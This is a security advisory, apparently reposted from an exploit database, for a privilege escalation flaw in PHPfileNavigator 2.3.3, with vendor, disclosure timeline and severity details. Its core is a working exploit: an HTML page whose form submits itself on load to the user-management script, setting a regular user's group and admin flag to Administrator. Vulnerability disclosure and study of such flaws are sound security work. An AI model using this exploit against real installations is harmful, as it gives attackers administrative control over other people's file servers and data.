PHPfileNavigator 2.3.3 Privilege Escalation Exploit

PHPfileNavigator 2.3.3 Privilege Escalation
Published

John Page aka hyp3rlinx

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812b.txt



Vendor:
=========================
pfn.sourceforge.net



Product:
=====================================================
PHPfileNavigator v2.3.3 (pfn)

Is state-of-the-art, open source web based application
to complete manage your files and folders.



Vulnerability Type:
=============================
Privilege Escalation



CVE Reference:
==============
N/A




Vulnerability Details:
=====================
We can elevate privileges from that of a regular user
to an Admin level. In order for the attack
to succeed and escalate privileges to become Admin you need
know your ID for the 'id_usuario' field when executing the
attack.

Tested using xampp-1.7.0


Exploit code(s):
===============

<!DOCTYPE>
<html>
<script>
function pwn(){
var e=document.getElementById('ELEVATO_DE_PRIVLOS')
e.submit()

}
</script>
<body onLoad="pwn()">


<!-- Escalate privs to that of Admin -->

<form id="ELEVATO_DE_PRIVLOS" action="
http://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/gdar.php"
method="post">
<input type="hidden" name="id_usuario" value="5" />
<input type="text" id="nome" name="nome" value="b2" class="text"
tabindex="10" />
<input type="text" id="usuario" name="usuario" value="b2" class="text"
tabindex="20" />
<input type="password" id="contrasinal" name="contrasinal"
value="abc123" class="text" tabindex="30" />
<input type="password" id="rep_contrasinal" name="rep_contrasinal"
value="abc123" class="text" tabindex="40" />
<input type="text" id="email" name="email" value="[email protected]" class="text"
tabindex="50" />
<input type="text" id="max_descargas" name="max_descargas" value="0"
class="text" tabindex="60" />
<input type="text" id="actual_descargas" name="actual_descargas"
value="0" class="text" tabindex="70" />
<select id="cambiar_datos" name="cambiar_datos" tabindex="75">
<option value="1" >ON</option>
<option value="0" selected="selected">OFF</option>
</select>
<select id="id_grupo" name="id_grupo" tabindex="80">
<option value="1" selected="selected">Administrators</option>
</select>
<select id="admin" name="admin" tabindex="90">
<option value="1" selected="selected">ON</option>
<option value="0">OFF</option>
</select>
<select id="estado" name="estado" tabindex="100">
<option value="1" selected="selected">ON</option>
<option value="0" >OFF</option>
</select>
<input type="checkbox" id="Fraices_1" name="Fraices[]" value="1"
class="checkbox" />
</form>

</body>
</html>




Disclosure Timeline:
=========================================================
Vendor Notification: August 8, 2015
August 12, 2015 : Public Disclosure



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s): [+] POST


Vulnerable Product: [+] PHPfileNavigator v2.3.3 (pfn)


Vulnerable Parameter(s): [+] id_grupo, admin, id_usuario


Affected Area(s): [+] Admin

#  0day.today [2018-04-12]  #